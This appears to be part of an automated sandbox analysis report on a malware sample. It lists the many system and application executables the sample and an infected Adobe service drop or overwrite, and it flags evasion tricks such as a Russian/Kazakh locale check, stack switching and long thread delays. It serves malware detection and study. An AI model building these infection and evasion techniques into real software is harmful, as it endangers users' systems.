Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File created: C:\Windows\System32\Locator.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\AgentService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\VSSVC.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\wbengine.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\SearchIndexer.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File created: C:\Windows\System32\AppVClient.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File created: C:\Windows\System32\FXSSVC.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\TieringEngineService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\vds.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\OpenSSH\ssh-agent.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File created: C:\Windows\SysWOW64\perfhost.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File created: C:\Windows\System32\alg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File created: C:\Windows\System32\msiexec.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File created: C:\Windows\System32\SensorDataService.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File created: C:\Windows\System32\msdtc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Creates files inside the volume driver (system volume information)

Source: C:\Windows\System32\TieringEngineService.exe

File created: C:\System Volume Information\Heat\

Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to behave differently if execute on a Russian/Kazak computer

Source: C:\Windows\System32\AppVClient.exe	Code function: 7_2_00BA5346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]	7_2_00BA5346
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 10_2_00995346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]	10_2_00995346
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 11_2_00CD5346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]	11_2_00CD5346
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Code function: 13_2_00BC5346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]	13_2_00BC5346
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Code function: 19_2_00D65346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]	19_2_00D65346

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\SABXJ1B5c8.exe

API/Special instruction interceptor: Address: D141F4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599718
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599598
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599469
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599344
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597233
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596905
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596797
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596685
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596564
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596438
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596216
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595116
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594648
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594469
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594241
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594107
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593849
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593719
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593110

Source: C:\Windows\System32\msdtc.exe	Window / User API: threadDelayed 482	Jump to behavior
Source: C:\Windows\SysWOW64\perfhost.exe	Window / User API: threadDelayed 5358	Jump to behavior
Source: C:\Windows\SysWOW64\perfhost.exe	Window / User API: threadDelayed 4640	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 4303
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 5508

Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.149\chrome_pwa_launcher.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.149\elevation_service.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	Dropped PE file which has not been started: C:\Windows\System32\Spectrum.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Windows Media Player\wmpnetwk.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7z.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	Dropped PE file which has not been started: C:\Windows\System32\msiexec.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.149\notification_helper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\chrmstp.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Install\{AB28DC01-2BE1-4DAE-B39D-56281F166EE0}\117.0.5938.149_117.0.5938.132_chrome_updater.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to dropped file
